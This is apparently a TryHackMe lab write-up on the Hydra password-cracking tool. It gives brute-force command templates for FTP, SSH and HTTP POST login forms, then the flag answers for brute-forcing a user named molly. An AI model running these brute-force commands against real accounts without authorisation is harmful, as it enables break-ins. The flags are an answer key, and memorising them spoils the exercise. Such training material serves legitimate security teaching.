Hydra

Task 1Hydra Introduction

Hydra is an online password cracking tool which uses brute force.

Task 2Using Hydra

• Use Hydra for brute force attacks on services such as FTP and SSH.
• FTP Command: hydra -l user -P passlist.txt ftp://MACHINE_IP
• SSH Command: hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh
• l: SSH username
• P: List of passwords
• t: Number of threads
• Hydra can also brute force web forms.
• Command for POST Web Form: sudo hydra <username> <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"
• l: Username for web form login
• P: Password list
• http-post-form: Form type is POST
• <path>: Login page URL
• <login_credentials>: Username and password for login
• <invalid_response>: Part of response when login fails
• V: Verbose output for each attempt
• Example Command for POST Web Form: hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

Use Hydra to bruteforce molly’s web password. What is flag 1?

Ans: THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to bruteforce molly’s SSH password. What is flag 2?

Ans: THM{c8eeb0468febbadea859baeb33b2541b}